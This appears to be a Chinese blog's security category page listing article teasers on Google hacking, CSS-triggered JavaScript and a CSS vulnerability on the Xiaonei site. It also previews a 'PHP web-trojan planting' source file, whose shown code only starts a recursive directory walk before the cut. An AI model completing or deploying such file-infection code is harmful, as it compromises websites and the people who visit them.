
安全
文章平均质量分 76
ORACLE800
这个作者很懒,什么都没留下…
展开
-
利用Google进行入侵的原理及防范
2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google? 和google attacks 的主题演讲。经过安全焦点论坛原版主WLJ翻译整理后,个人觉得有必要补充完善一些细节部分。今天向大家讲述的是Google的又一功能:利用搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,甚至可以直接进行傻瓜入侵。 用google来转载 2008-04-27 22:00:00 · 1424 阅读 · 0 评论 -
css调用javascript
<!--google_ad_client = "pub-1654710028568330";/* 728x15, 创建于 08-5-19 */google_ad_slot = "1395130186";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"src=原创 2008-05-22 15:21:00 · 1567 阅读 · 0 评论 -
又见css漏洞!校内网css代码引发的漏洞
<!--google_ad_client = "pub-1654710028568330";/* 728x90, 创建于 08-5-19 */google_ad_slot = "5790075209";google_ad_width = 728;google_ad_height = 90;//--><script type="text/javascript"src=原创 2008-05-23 19:13:00 · 2600 阅读 · 0 评论 -
php挂马源文件
<?phpfunction gmfun($path=".") { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == "." || $v == "..") continue; $file = $d->path."/".$v; if(@is_dir($fil原创 2008-06-14 20:41:00 · 2562 阅读 · 0 评论